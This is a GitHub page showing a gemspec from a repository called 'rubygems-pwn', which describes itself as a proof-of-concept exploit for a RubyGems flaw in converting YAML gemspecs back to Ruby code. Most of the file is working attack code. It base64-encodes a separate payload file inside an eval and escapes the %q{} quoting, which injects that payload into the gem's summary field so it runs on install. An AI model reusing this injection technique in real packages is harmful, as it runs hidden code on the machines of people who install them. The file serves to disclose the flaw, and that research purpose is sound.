Skip to content
Newer
Older
100644 34 lines (26 sloc) 1.4 KB
c933bb2 @postmodern Initial commit.
postmodern authored
1 # -*- encoding: utf-8 -*-
2
3 require 'base64'
4
5 Gem::Specification.new do |s|
6 s.name = "rubygems-pwn"
7 s.version = "0.1.0"
8 s.authors = ["Postmodern"]
9 s.email = ["postmodern.mod3@gmail.com"]
10 s.homepage = "http://github.com/sophsec/rubygems-pwn"
11
12 # load the payload
13 payload = File.read(File.join(File.dirname(__FILE__),'lib','rubygems-pwn','payload.rb'))
14
15 embed_code = lambda { |code|
16 # base64 encode our payload, to hide any special characters
17 "require('base64');eval(Base64.decode64(#{Base64.encode64(code).inspect}))"
18 }
19 escape_code = lambda { |code|
20 # escape RubyGems Gem::Specification#ruby_code escaping logic which
21 # simple wraps Strings in "%q{" and "}".
22 "}; #{code} #"
23 }
24
25 s.description = %q{A Proof of Concept (PoC) exploit for an trivial Security vulnerability in how RubyGems converts YAML-dumped gemspecs, back into Ruby code, when installing RubyGems. This ties into the larger design mistake, of storing installed gemspecs as Ruby code; since evaling Ruby code was faster than loading YAML gemspecs. When handling data, it is safer to store it in a static format (YAML, XML, CSV), instead of executable code.}
26
27 # grab the first sentence of the description, and append our escaped code
28 s.summary = s.description.match(/^[^\.]+/)[0] +
29 escape_code[embed_code[payload]]
30
31 s.files = ['README.rdoc']
32 s.require_paths = ["lib"]
33 end
Something went wrong with that request. Please try again.